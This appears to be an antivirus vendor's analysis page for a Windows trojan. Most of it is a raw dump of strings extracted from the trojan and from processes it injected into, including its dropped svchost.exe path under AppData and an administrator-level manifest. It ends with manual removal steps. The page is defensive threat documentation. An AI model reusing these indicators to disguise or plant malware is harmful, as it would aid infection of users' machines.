Kernel32.dll

shell32.dll

ole32.dll

User32.dll

OLEACC.DLL

RegCreateKeyA

RegOpenKeyA

RegCloseKey

RegEnumKeyA

MsgWaitForMultipleObjects

EnumDesktopWindows

RegDeleteKeyA

program internal error number is %d.

:"%s"

:"%s".

U.phk

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe

456789;=

 *)('&$!

E~%SX5

6;%Up

456789;>

EH*W%X

$t.Rd8}

447688;>

%5 689:>

udpvuyzh

UDPVYHW^bz}

wcrtyo

BCRTNOXHuo

"$0!.(*>

%D%NO

qtcp

4567?92>

\25b.oo

89;;556-

.-,#" %XWGg

/.-,#" %XWGg

V7)9;/

#"./ !#&

3$1&?(*9

1032=<>;

,../ "#&

;:987641

3$:0)4</

~=%FL

%xud\i6

hI6%x9v

VRa-c}7v

R.otz

.Xg [2|

{ya%f

.Oj 4d

M_.yW

%9xDW

EQ8e.bW

4567?9$>

%.X.[

xJ9k2f%s

-i}Z9

f%Sw=E

z8B%d

C.bvx

.fe8e]

.Yf"ASF

3`.tB

.qG136

g-%d.

;99%US{~CL\

%.omKB

J.Cww

y.qP&67

.eCC}

-.PG>

Xqw%C}

g.gxb

x-tV}0

456(88;~0(\|

98;:5463

455789.>

456739">

 X.kA

#"! /.,)

0 0<0@0`0

OLEACC.dll

-PnD}

flU.Ee

7[ole32.dll

USER32.dll

KERNEL32.dll

SHELL32.dll

v#9%D

OLEAUT32.dll

SHLWAPI.dll

-G*%x

6"%c{

28y.hT

>l%dr

/&%Xu

I-6}~

8e}.HG

Ôf"

.nG5X}

:(Z%X#

V..HW"

2O%c{

,.oWNf

6.vM:|

.HEho

/7%Cu

.ik]`

.rZXPW

ú!O

.wgOX

4,.Rse%

Os|/}.TL

u%c j

.lk $

.zXEg

x9)%s

[x%F%

&e{.oF:oy

hwEb

7C.SVN

XO%F~

^.cYKjB

q.HW0

kL.MXs

.dF?c

,=$.tkl

MÜ*

;-H}m

.hI;46c>pK

D@zmsG

D.aNh7D!`

]v.hf

9T-Pdf}

?%C\&

-c~c%s

M%c]_

%FzUu

xD%.OM

E'.vi

2L.DU

a.maC

R%S~N/^G

.wOmtu

v-Ol}kF

.A.Oc

H%F"y

%u]"t

g,Q}.wm_c

hT%uE

Y?.jT

]$.Zr0V

.Usu,;

bL.Qs

R.aj$E

0%sBY

.heF]

2@l.Ht"

WU*.jGd

yI.wWI

.Qa*S

'.zV?

g.uSE$

3C%Dg

9k%FMp

1|%S

MSVCRT.dll

ZR61<%D

[.Xp;u&3

ADVAPI32.dll

*6Âk

81Þ

nEb.cRw&Dz

$Ï'

:.MjQ

B:Í

.Mx&[

`]T-O}S{E

1%XJVt

@.euee

0%c<pf?

.ZHh^

.Pq k

m.pz_

V5.rN

92>>4:::444

4$1$%dh`Vp/8

%D_RE

]].eX6t0

co.KKV-C^

.cEvO:8

88888888

888888888

8888888888

88888888888

 k5%D

zU.CC

<td width="800" height="48" background="top.jpg" >

<td width="800" height="460" background="background.jpg" align="center" valign="top">

<img src="logo.gif">

<assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32" />

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" />

<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

KERNEL32.DLL

mscoree.dll

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

7.5.16.11257

Copyright(C) 2004-2013 KuGou-Inc.All Rights Reserved

KuGou.exe

svchost.exe_2944_rwx_00421000_000F7000:

U.phk

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe

456789;=

 *)('&$!

E~%SX5

6;%Up

456789;>

EH*W%X

$t.Rd8}

447688;>

%5 689:>

udpvuyzh

UDPVYHW^bz}

wcrtyo

BCRTNOXHuo

"$0!.(*>

%D%NO

qtcp

4567?92>

\25b.oo

89;;556-

.-,#" %XWGg

/.-,#" %XWGg

V7)9;/

#"./ !#&

3$1&?(*9

1032=<>;

,../ "#&

;:987641

3$:0)4</

~=%FL

%xud\i6

hI6%x9v

VRa-c}7v

R.otz

.Xg [2|

{ya%f

.Oj 4d

M_.yW

%9xDW

EQ8e.bW

4567?9$>

%.X.[

xJ9k2f%s

-i}Z9

f%Sw=E

z8B%d

C.bvx

.fe8e]

.Yf"ASF

3`.tB

.qG136

g-%d.

;99%US{~CL\

%.omKB

J.Cww

y.qP&67

.eCC}

-.PG>

Xqw%C}

g.gxb

x-tV}0

456(88;~0(\|

98;:5463

455789.>

456739">

 X.kA

#"! /.,)

0 0<0@0`0

KERNEL32.DLL

mscoree.dll

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

iexplore.exe_3712:

.text

`.data

.rsrc

@.reloc

Bv.TBv

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_3220:

.text

`.data

.rsrc

@.reloc

Bv.TBv

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

SearchProtocolHost.exe_2872:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

Phx%C

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

</MSG></TRC>

<MSG>

<ERR> 0xx=

<LOC> %s(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<LOC> %S(%d) </LOC>

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

SearchFilterHost.exe_2800:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

<requestedExecutionLevel

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<ERR> 0xx=

<LOC> %S(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

</MSG></TRC>

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:2948
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\svchost.exe (6076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe (9645 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.GenericKD.3790753_6b0f84e316

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.GenericKD.3790753_6b0f84e316

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet